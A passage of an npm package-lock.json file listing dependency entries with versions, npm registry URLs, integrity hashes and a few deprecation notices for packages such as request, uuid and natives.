}, "node_modules/is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "node_modules/isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "node_modules/isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "node_modules/jsbn": { "version": 
"0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "node_modules/json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "node_modules/json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "node_modules/jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" }, "engines": { "node": ">=0.6.0" } }, "node_modules/mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "engines": { "node": ">= 0.6" } }, "node_modules/mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" }, "engines": { "node": ">= 0.6" } }, "node_modules/minimatch": { "version": "3.1.2", "resolved": 
"https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", "dependencies": { "brace-expansion": "^1.1.7" }, "engines": { "node": "*" } }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" }, "bin": { "mkdirp": "bin/cmd.js" } }, "node_modules/natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==", "deprecated": "This module relies on Node.js's internals and will break at some point. Do not use it, and update to graceful-fs@4.x." 
}, "node_modules/normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "dependencies": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "node_modules/npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "dependencies": { "hosted-git-info": "^1.5.3", "semver": "4" } }, "node_modules/npm-package-arg/node_modules/hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" }, "node_modules/npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "dependencies": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" }, "optionalDependencies": { "npmlog": "" } }, "node_modules/npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "dependencies": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", 
"set-blocking": "^2.0.0" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", "engines": { "node": "*" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } }, "node_modules/path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", "engines": { "node": ">=0.10.0" } }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "node_modules/performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "node_modules/psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "node_modules/punycode": { "version": "2.3.1", "resolved": 
"https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "engines": { "node": ">=6" } }, "node_modules/qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", "engines": { "node": ">=0.6" } }, "node_modules/readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "node_modules/request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", "dependencies": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" }, "engines": { "node": ">= 6" } }, "node_modules/resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": 
"sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==", "engines": { "node": "*" } }, "node_modules/rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "dependencies": { "glob": "^7.1.3" }, "bin": { "rimraf": "bin.js" } }, "node_modules/safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "node_modules/safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "node_modules/semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==", "bin": { "semver": "bin/semver" } }, "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "node_modules/signal-exit": { "version": "4.1.0", "resolved": 
"https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true, "engines": { "node": ">=14" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==", "engines": { "node": "*" } }, "node_modules/spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "dependencies": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "node_modules/spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "dependencies": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "node_modules/sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "dependencies": { "asn1": "~0.2.3", 
"assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" }, "bin": { "sshpk-conv": "bin/sshpk-conv", "sshpk-sign": "bin/sshpk-sign", "sshpk-verify": "bin/sshpk-verify" }, "engines": { "node": ">=0.10.0" } }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } }, "node_modules/string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" }, "engines": { "node": ">=8" } }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, "engines": { "node": ">=8" } }, "node_modules/supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "engines": { "node": ">= 0.4" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", 
"dependencies": { "psl": "^1.1.28", "punycode": "^2.1.1" }, "engines": { "node": ">=0.8" } }, "node_modules/tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "dependencies": { "safe-buffer": "^5.0.1" }, "engines": { "node": "*" } }, "node_modules/tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "node_modules/uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "dependencies": { "punycode": "^2.1.0" } }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "node_modules/uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. 
See https://v8.dev/blog/math-random for details.", "bin": { "uuid": "bin/uuid" } }, "node_modules/validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "node_modules/verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "engines": [ "node >=0.6.0" ], "dependencies": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" } }, "node_modules/verror/node_modules/core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" }, "node_modules/wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } }, "dependencies": { "ajv": { "version": "6.12.6", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", "requires": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" } }, 
"ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true }, "aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true }, "asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "requires": { "safer-buffer": "~2.1.0" } }, "assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" }, "aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", 
"integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "requires": { "tweetnacl": "^0.14.3" } }, "brace-expansion": { "version": "1.1.11", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", "requires": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" } }, "caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { "delayed-stream": "~1.0.0" } }, "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "concat-stream": { "version": "1.5.0", "resolved": 
